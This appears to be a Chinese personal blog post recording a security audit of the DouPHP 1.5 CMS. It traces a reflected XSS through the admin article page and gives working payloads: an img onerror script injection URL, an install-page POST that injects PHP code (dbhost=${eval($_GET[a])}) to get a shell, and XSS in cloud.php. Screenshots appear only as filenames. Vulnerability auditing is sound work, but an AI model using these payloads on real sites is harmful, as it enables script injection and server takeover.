一个抽象人的小站

# douphp v 1.5 审计记录

代码审计 Tags: 无标签 阅读: 153

admin/article.php 反射型xss

漏洞在
1.PNG

由于引入了init.php 进入init.php查看
2.PNG

可以看到new了一个firewall的类然后调用

跟入firewall.class.php查看
3.PNG

可以看到全局对 GET POST REQUEST COOKIE 进行转义

$keyword带入了$get
4.PNG

$get 被传入了一个paper的方法里面 跟进方法

5.PNG

6.PNG
可以看到最终被添加到$paper 然后渲染到模板里面

最终payload

http://localhost:8888/douphp/admin/article.php?rec=default&keyword=2222%22%3E%3Cimg%20src=%23%20onerror=alert(1)%3E%3C%22

admin/cloud.php xss

3333.PNG

555.PNG

8888.PNG

Install/index.php Getshell

1.PNG

payload

http://127.0.0.1/douphp/install/index.php?step=install
Post
dbhost=${eval($_GET[a])}

2.PNG

cloud.php 反射型xss

http://localhost:8888/douphp/admin/cloud.php?rec=details

name=xss payload

1.PNG

发表评论